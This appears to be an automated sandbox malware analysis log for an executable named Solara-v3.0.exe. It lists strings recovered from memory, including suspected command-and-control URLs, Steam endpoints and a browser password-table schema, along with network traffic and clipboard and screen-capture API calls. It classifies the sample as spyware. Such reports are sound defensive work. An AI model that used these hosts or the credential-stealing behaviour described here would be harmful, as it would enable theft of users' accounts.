                    Source: Solara-v3.0.exe, 00000004.00000003.2220043538.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193758527.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.co
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287545838.0000000003386000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168563080.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2169156073.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279860788.0000000003388000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168880871.0000000005A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2168563080.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2169156073.0000000005A22000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168880871.0000000005A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api2Y61
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.0000000003389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiA
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiP
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiZ
                    Source: Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiifaf)
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279754011.000000000336A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287461223.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaoc
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                    Source: Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/i
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m
                    Source: Solara-v3.0.exe, 00000004.00000003.2168376117.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2194080227.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168921255.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168753100.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/p
                    Source: Solara-v3.0.exe, 00000004.00000003.2094435929.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094598295.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: Solara-v3.0.exe, 00000004.00000002.3288014085.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2233799015.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/w
                    Source: Solara-v3.0.exe, 00000004.00000002.3287249240.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: Solara-v3.0.exe, 00000004.00000003.2094598295.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117296119.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.00000000032FB000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/api0
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Solara-v3.0.exeString found in binary or memory: https://www.entrust.net/rpa0
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Solara-v3.0.exe, 00000004.00000003.2169895889.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_004322E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004322E0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_05851000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,4_2_05851000
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043328C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,4_2_0043328C
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CACFD6 appears 40 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00C9FAE4 appears 34 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00413CD0 appears 75 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CA0730 appears 38 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00407FA0 appears 47 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00CA80F8 appears 42 times
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: String function: 00C9FA60 appears 100 times
                    Source: Solara-v3.0.exeStatic PE information: invalid certificate
                    Source: Solara-v3.0.exe, 00000000.00000000.2025856316.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000003.00000000.2032657804.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000004.00000002.3287079855.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exe, 00000004.00000003.2033176772.0000000004D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara-v3.0.exe
                    Source: Solara-v3.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Solara-v3.0.exeStatic PE information: Section: .bss ZLIB complexity 1.0003298756270902
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@11/2
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_00437CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_00437CF0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                    Source: Solara-v3.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Solara-v3.0.exe, 00000004.00000003.2119068952.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2142061366.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118711046.0000000005A47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Solara-v3.0.exeReversingLabs: Detection: 36%
                    Source: Solara-v3.0.exeVirustotal: Detection: 50%
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile read: C:\Users\user\Desktop\Solara-v3.0.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
